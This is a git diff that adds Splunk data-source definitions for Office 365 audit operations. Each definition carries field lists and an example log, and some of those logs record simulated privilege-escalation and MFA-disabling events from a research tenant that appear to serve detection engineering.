+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-10-20T16:50:46", "Id": "30a8b107-b190-406c-9b80-c3f5c3a29129",
+  "Operation": "Add member to role.", "OrganizationId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5",
+  "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "lowpriv@splunkresearch.onmicrosoft.com",
+  "UserId": "attacker@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType":
+  1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name":
+  "extendedAuditEventCategory", "Value": "Role"}], "ModifiedProperties": [{"Name":
+  "Role.ObjectID", "NewValue": "0ee19da2-ee3d-4743-ae53-8cb79599c384", "OldValue":
+  ""}, {"Name": "Role.DisplayName", "NewValue": "Company Administrator", "OldValue":
+  ""}, {"Name": "Role.TemplateId", "NewValue": "62e90394-69f5-4237-9190-012177145e10",
+  "OldValue": ""}, {"Name": "Role.WellKnownObjectName", "NewValue": "TenantAdmins",
+  "OldValue": ""}], "Actor": [{"ID": "attacker@splunkresearch.onmicrosoft.com", "Type":
+  5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "Microsoft Office 365 Portal",
+  "Type": 1}, {"ID": "00000006-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f",
+  "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User",
+  "Type": 2}], "ActorContextId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5", "InterSystemsId":
+  "6a6b4dfe-8b77-49db-9999-510115d1f3dd", "IntraSystemId": "c36bfbae-b287-415b-bc14-ab5c3a9248d7",
+  "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72",
+  "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User",
+  "Type": 2}, {"ID": "lowpriv@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID":
+  "10032002CC029AE9", "Type": 3}], "TargetContextId": "d8211c86-3244-409b-8c4f-ae27ed34b4a5"}'
diff --git a/data_sources/o365_add_owner_to_application_.yml b/data_sources/o365_add_owner_to_application_.yml
new file mode 100644
index 0000000000..a0d2109a5d
--- /dev/null
+++ b/data_sources/o365_add_owner_to_application_.yml
@@ -0,0 +1,107 @@
+name: O365 Add owner to application.
+id: da012cbf-af6e-40ee-a1ba-32a5f8da8f8a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add owner to application.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-07T13:42:04", "Id": "6e2c723b-8f6e-47f4-8c60-fa23ef3fccee",
+  "Operation": "Add owner to application.", "OrganizationId": "48203edf-5d2c-45f2-8123-a368cc8b0e51",
+  "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "user2@contoso.onmicrosoft.com",
+  "UserId": "user@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties":
+  [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh;
+  Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0
+  Safari/537.36\"}"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}],
+  "ModifiedProperties": [{"Name": "Application.ObjectID", "NewValue": "a2d68f8b-ab9f-47ac-934f-b966c3ac134f",
+  "OldValue": ""}, {"Name": "Application.DisplayName", "NewValue": "TestApp2", "OldValue":
+  ""}, {"Name": "Application.AppId", "NewValue": "95106c0e-3519-450e-8e38-7f326d873454",
+  "OldValue": ""}], "Actor": [{"ID": "user@contoso.onmicrosoft.com", "Type": 5}, {"ID":
+  "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type":
+  2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f",
+  "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "48203edf-5d2c-45f2-8123-a368cc8b0e51",
+  "InterSystemsId": "3f6a58c5-2fba-401d-b137-82b860830213", "IntraSystemId": "e8034ddc-0ca3-4aca-996c-1dc6dee48679",
+  "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72",
+  "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User",
+  "Type": 2}, {"ID": "user2@contoso.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9",
+  "Type": 3}], "TargetContextId": "48203edf-5d2c-45f2-8123-a368cc8b0e51"}'
diff --git a/data_sources/o365_add_service_principal_.yml b/data_sources/o365_add_service_principal_.yml
new file mode 100644
index 0000000000..de75175eb5
--- /dev/null
+++ b/data_sources/o365_add_service_principal_.yml
@@ -0,0 +1,116 @@
+name: O365 Add service principal.
+id: 9c1ef9f5-bc30-4a47-a1bd-cb34484ee778
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add service principal.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src_user
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2024-02-07T22:31:14", "Id": "f624ed92-b4a2-4d42-aa8b-20a261d06b7f",
+  "Operation": "Add service principal.", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4",
+  "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "e06366ca-8489-4748-b6a2-d7e4332f45c1",
+  "UserId": "user30@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType":
+  1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0
+  (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0
+  Safari/537.36\",\"AppId\":\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"}"}, {"Name":
+  "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties":
+  [{"Name": "AccountEnabled", "NewValue": "[\r\n  true\r\n]", "OldValue": "[]"}, {"Name":
+  "AppPrincipalId", "NewValue": "[\r\n  \"e06366ca-8489-4748-b6a2-d7e4332f45c1\"\r\n]",
+  "OldValue": "[]"}, {"Name": "DisplayName", "NewValue": "[\r\n  \"Malicious11\"\r\n]",
+  "OldValue": "[]"}, {"Name": "ServicePrincipalName", "NewValue": "[\r\n  \"e06366ca-8489-4748-b6a2-d7e4332f45c1\"\r\n]",
+  "OldValue": "[]"}, {"Name": "Credential", "NewValue": "[\r\n  {\r\n    \"CredentialType\":
+  2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\":
+  \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]", "OldValue": "[]"}, {"Name":
+  "Included Updated Properties", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName,
+  ServicePrincipalName, Credential", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames",
+  "NewValue": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "OldValue": ""}], "Actor": [{"ID":
+  "user30@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E",
+  "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f",
+  "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User",
+  "Type": 2}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "InterSystemsId":
+  "ea473f15-64b3-435a-a885-6ee3908919e2", "IntraSystemId": "00000000-0000-0000-0000-000000000000",
+  "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_2dedf863-ac93-4f45-87b3-e32f48145380",
+  "Type": 2}, {"ID": "2dedf863-ac93-4f45-87b3-e32f48145380", "Type": 2}, {"ID": "ServicePrincipal",
+  "Type": 2}, {"ID": "Malicious11", "Type": 1}, {"ID": "e06366ca-8489-4748-b6a2-d7e4332f45c1",
+  "Type": 2}, {"ID": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "Type": 4}], "TargetContextId":
+  "75243ab2-44f8-435c-a7a6-b479385df6d4"}'
diff --git a/data_sources/o365_change_user_license_.yml b/data_sources/o365_change_user_license_.yml
new file mode 100644
index 0000000000..ee0fda32fb
--- /dev/null
+++ b/data_sources/o365_change_user_license_.yml
@@ -0,0 +1,100 @@
+name: O365 Change user license.
+id: 1029a20d-3d0d-4fb9-b5e2-22ac5380b20a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Change user license.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src_user
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-11T15:55:46", "Id": "1e39f32d-081d-4494-994a-533b57f91df7",
+  "Operation": "Change user license.", "OrganizationId": "bbad9541-eb53-4533-bcef-2b76182c3b75",
+  "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "victimUser@splunkresearch.onmicrosoft.com",
+  "UserId": "evilUser@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType":
+  1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"id\":\"64c07906-cb25-4d37-b38c-a862f2e49671\",\"seq\":\"6\",\"b\":\"://admin.microsoft.com;https://wusportalprv.office.com;https://auth.microsoftonline.com;https://portal.office.com;https://portal-sdf.office.com/;https://portal.office.com/;https://cp.portal.office.com/;https://scuportalprv.office.com;https://ncuportalprv.office.com;https://ncuportal.office.com;https://weuportal.office.com;https://eusportal.office.com;https://neuportal.office.com;https://scuportal.office.com;https://seaportal.office.com;https://wusportal.office.com;https://easportal.office.com;https://wjpportal.office.com;https://ejpportal.office.com;https://nukportal.office.com;https://sukportal.office.com;https://admin-ignite.microsoft.com;https://admin-sdf.microsoft.com;https://wukportal.office.com/\\\\\\\"},{\\\\\\\"Name\\\\\\\":\\\\\\\"SPN\\\\\\\",\\\\\\\"OldValue\\\\\\\":null,\\\\\\\"NewValue\\\\\\\":\\\\\\\"Microsoft.Office365Portal;00000006-0000-0ff1-ce00-000000000000;00000006-0000-0ff1-ce00-000000000000/portal.microsoftonline.com;https://ncuportalprv-staging.office.com;https://scuportalprv-staging.office.com;https://admin.microsoft365.com;https://portal-sdf.apps.mil/;https://portal-sdf.apps.mil;https://portal.apps.mil/;https://portal.apps.mil;https://portal-sdf.office365.us/;https://portal-sdf.office365.us;https://portal.office365.us/;https://portal.office365.us;https://portal.microsoft.com;https://admin.microsoft.com;https://wusportalprv.office.com;https://auth.microsoftonline.com;https://portal.office.com;https://portal-sdf.office.com/;https://portal.office.com/;https://cp.portal.office.com/;https://scuportalprv.office.com;https://ncuportalprv.office.com;https://ncuportal.office.com;https://weuportal.office.com;https://eusportal.office.com;https://neuportal.office.com;https://scuportal.office.com;https://seaportal.office.com;https://wusportal.office.com;https://easportal.office.com;https://wjpportal.office.com;https://ejpportal.office.com;https://nukportal.office.com;https://sukportal.office.com;https://admin-ignite.microsoft.com;https://admin-sdf.microsoft.com;https://wukportal.office.com/\\\\\\\"}]\\\",\\\"additionalDetails\\\":\\\"{\\\\\\\"User-Agent\\\\\\\":\\\\\\\"O365AdminPortal\\\\\\\"}\\\"}\",\"c\":\"6\"}"},
+  {"Name": "extendedAuditEventCategory", "Value": "User"}], "ModifiedProperties":
+  [], "Actor": [{"ID": "evilUser@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID":
+  "1003BFFD98415B4E", "Type": 3}, {"ID": "Microsoft Office 365 Portal", "Type": 1},
+  {"ID": "00000006-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f",
+  "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User",
+  "Type": 2}], "ActorContextId": "bbad9541-eb53-4533-bcef-2b76182c3b75", "InterSystemsId":
+  "0817f79e-f0ea-4518-9c21-7babc9a36a79", "IntraSystemId": "6ae5503d-8764-4f6f-9547-668f4b2f82ca",
+  "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72",
+  "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User",
+  "Type": 2}, {"ID": "victimUser@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID":
+  "10032002CC029AE9", "Type": 3}], "TargetContextId": "bbad9541-eb53-4533-bcef-2b76182c3b75"}'
diff --git a/data_sources/o365_consent_to_application_.yml b/data_sources/o365_consent_to_application_.yml
new file mode 100644
index 0000000000..224fd31009
--- /dev/null
+++ b/data_sources/o365_consent_to_application_.yml
@@ -0,0 +1,107 @@
+name: O365 Consent to application.
+id: 0a15a464-ef51-4614-9a07-a216eb9817db
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Consent to application.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-05T21:05:31", "Id": "5822e126-1fbc-4269-9ad6-4c1879cdbcf3",
+  "Operation": "Consent to application.", "OrganizationId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5",
+  "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "95106c0e-3519-450e-8e38-7f326d873454",
+  "UserId": "attacker@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1,
+  "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0
+  (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0
+  Safari/537.36\",\"AppId\":\"95106c0e-3519-450e-8e38-7f326d873454\"}"}, {"Name":
+  "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties":
+  [{"Name": "ConsentContext.IsAdminConsent", "NewValue": "True", "OldValue": ""},
+  {"Name": "ConsentContext.IsAppOnly", "NewValue": "False", "OldValue": ""}, {"Name":
+  "ConsentContext.OnBehalfOfAll", "NewValue": "True", "OldValue": ""}, {"Name": "ConsentContext.Tags",
+  "NewValue": "", "OldValue": ""}, {"Name": "ConsentAction.Permissions", "NewValue":
+  "[] => [[Id: r2KtIS6Zn0q2wWeqbIputLSZcc5Sj_NGtUtP2B3pYeI, ClientId: 21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4,
+  PrincipalId: , ResourceId: ce7199b4-8f52-46f3-b54b-4fd81de961e2, ConsentType: AllPrincipals,
+  Scope: User.Read, CreatedDateTime: , LastModifiedDateTime ]]; ", "OldValue": ""},
+  {"Name": "TargetId.ServicePrincipalNames", "NewValue": "95106c0e-3519-450e-8e38-7f326d873454",
+  "OldValue": ""}], "Actor": [{"ID": "attacker@contoso.onmicrosoft.com", "Type": 5},
+  {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
+  "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID":
+  "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}],
+  "ActorContextId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5", "InterSystemsId": "e0fb6206-12db-4fdf-bf52-699b254124d3",
+  "IntraSystemId": "897d35e6-e2dc-455e-ba65-e6d58adae01f", "SupportTicketId": "",
+  "Target": [{"ID": "ServicePrincipal_21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4", "Type":
+  2}, {"ID": "21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4", "Type": 2}, {"ID": "ServicePrincipal",
+  "Type": 2}, {"ID": "TestApp2", "Type": 1}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454",
+  "Type": 2}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454", "Type": 4}], "TargetContextId":
+  "9c00a473-1b2c-4bc2-9215-84df3f57aee5"}'
diff --git a/data_sources/o365_disable_strong_authentication_.yml b/data_sources/o365_disable_strong_authentication_.yml
new file mode 100644
index 0000000000..a3f8bf8f8f
--- /dev/null
+++ b/data_sources/o365_disable_strong_authentication_.yml
@@ -0,0 +1,99 @@
+name: O365 Disable Strong Authentication.
+id: 235381c4-382a-4183-b818-a51c3ce12187
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Disable Strong Authentication.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- ClientIP
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- extendedAuditEventCategory
+- extended_properties
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"Actor": [{"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID":
+  "10037FFEA938FB92", "Type": 3}, {"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484",
+  "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "User",
+  "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress":
+  "", "AzureActiveDirectoryEventType": 1, "ClientIP": "", "CreationTime": "2020-12-15T22:35:20",
+  "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory",
+  "Value": "User"}], "Id": "a5aea9c5-b879-495a-b764-119b2bd54d80", "InterSystemsId":
+  "9d18b521-23df-4130-99e2-1ff2eee13333", "IntraSystemId": "7d96ab40-6e16-48e5-bf78-677c89683775",
+  "ModifiedProperties": [{"Name": "StrongAuthenticationRequirement", "NewValue": "[]",
+  "OldValue": "[\r\n  {\r\n    \"RelyingParty\": \"*\",\r\n    \"State\": 0,\r\n    \"RememberDevicesNotIssuedBefore\":
+  \"2020-12-15T20:47:57+00:00\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties",
+  "NewValue": "StrongAuthenticationRequirement", "OldValue": ""}], "ObjectId": "rodsoto@rodsoto.onmicrosoft.com",
+  "Operation": "Disable Strong Authentication.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID":
+  "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484",
+  "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "rodsoto@rodsoto.onmicrosoft.com",
+  "Type": 5}, {"ID": "10037FFEA938FB92", "Type": 3}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "UserId": "rodsoto@rodsoto.onmicrosoft.com", "UserKey": "10037FFEA938FB92@rodsoto.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/o365_mailitemsaccessed.yml b/data_sources/o365_mailitemsaccessed.yml
new file mode 100644
index 0000000000..25a06ee957
--- /dev/null
+++ b/data_sources/o365_mailitemsaccessed.yml
@@ -0,0 +1,94 @@
+name: O365 MailItemsAccessed
+id: 3d5188eb-341a-4b46-9caa-aade4047d027
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 MailItemsAccessed
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- AppId
+- ClientAppId
+- ClientIPAddress
+- ClientInfoString
+- CreationTime
+- ExternalAccess
+- Folders{}.FolderItems{}.InternetMessageId
+- Folders{}.FolderItems{}.SizeInBytes
+- Folders{}.Id
+- Folders{}.Path
+- Id
+- InternalLogonType
+- IsThrottled
+- LogonType
+- LogonUserSid
+- MailAccessType
+- MailboxGuid
+- MailboxOwnerSid
+- MailboxOwnerUPN
+- Operation
+- OperationCount
+- OperationProperties{}.Name
+- OperationProperties{}.Value
+- OrganizationId
+- OrganizationName
+- OriginatingServer
+- RecordType
+- ResultStatus
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc
+- host
+- index
+- linecount
+- punct
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2024-02-01T16:07:34", "Id": "9cef02e9-4bfa-4c73-be7d-9dad68b9cea8",
+  "Operation": "MailItemsAccessed", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4",
+  "RecordType": 50, "ResultStatus": "Succeeded", "UserKey": "100320030DF47B14", "UserType":
+  0, "Version": 1, "Workload": "Exchange", "UserId": "user15@splunkresearch.onmicrosoft.com",
+  "AppId": "47629505-c2b6-4a80-adb1-9b3a3d233b7b", "ClientAppId": "47629505-c2b6-4a80-adb1-9b3a3d233b7b",
+  "ClientIPAddress": "120.1.121.35", "ClientInfoString": "Client=WebServices;ExchangeWebServicesProxy/CrossSite/EXCH/15.20.7249.024/python-requests/2.25.1[AppId=47629505-c2b6-4a80-adb1-9b3a3d233b7b];",
+  "ExternalAccess": false, "InternalLogonType": 0, "LogonType": 0, "LogonUserSid":
+  "S-1-5-21-1148582062-3132321681-773847816-49307764", "MailboxGuid": "7cfcc8fc-0d4a-4e1c-9592-dbb3de1e3859",
+  "MailboxOwnerSid": "S-1-5-21-1148582062-3132321681-773847816-49307764", "MailboxOwnerUPN":
+  "user15@splunkresearch.onmicrosoft.com", "OperationProperties": [{"Name": "MailAccessType",
+  "Value": "Bind"}, {"Name": "IsThrottled", "Value": "False"}], "OrganizationName":
+  "splunkresearch.onmicrosoft.com", "OriginatingServer": "CH0PR18MB5530 (15.20.4200.000)\r\n",
+  "Folders": [{"FolderItems": [{"InternetMessageId": "<CAFpGju6Zzs6HoCNQsDh0=F=vS7KHikisdRrnC_avRsZhqK2iXQ@mail.mail.com>",
+  "SizeInBytes": 44329}, {"InternetMessageId": "<CAFpGju6MHeSA5yKSaPK4w+p1uYWmZ_zew8kF8200_=DtqkvipA@mail.mail.com>",
+  "SizeInBytes": 44304}, {"InternetMessageId": "<CAFpGju7uUnyyuZmuc9rm593BsA6yeB+86GCDg5KzSE48TaAb4Q@mail.mail.com>",
+  "SizeInBytes": 44572}, {"InternetMessageId": "<CH0PR18MB5530506D1B68B05A99A1109FF185A@CH0PR18MB5530.namprd18.prod.outlook.com>",
+  "SizeInBytes": 245068}], "Id": "LgAAAAC0AxwgOj/BRq9Bs1bhMPw/AQDh+UNSDzeHSLWfq+fr83BDAAAAAAEMAAAB",
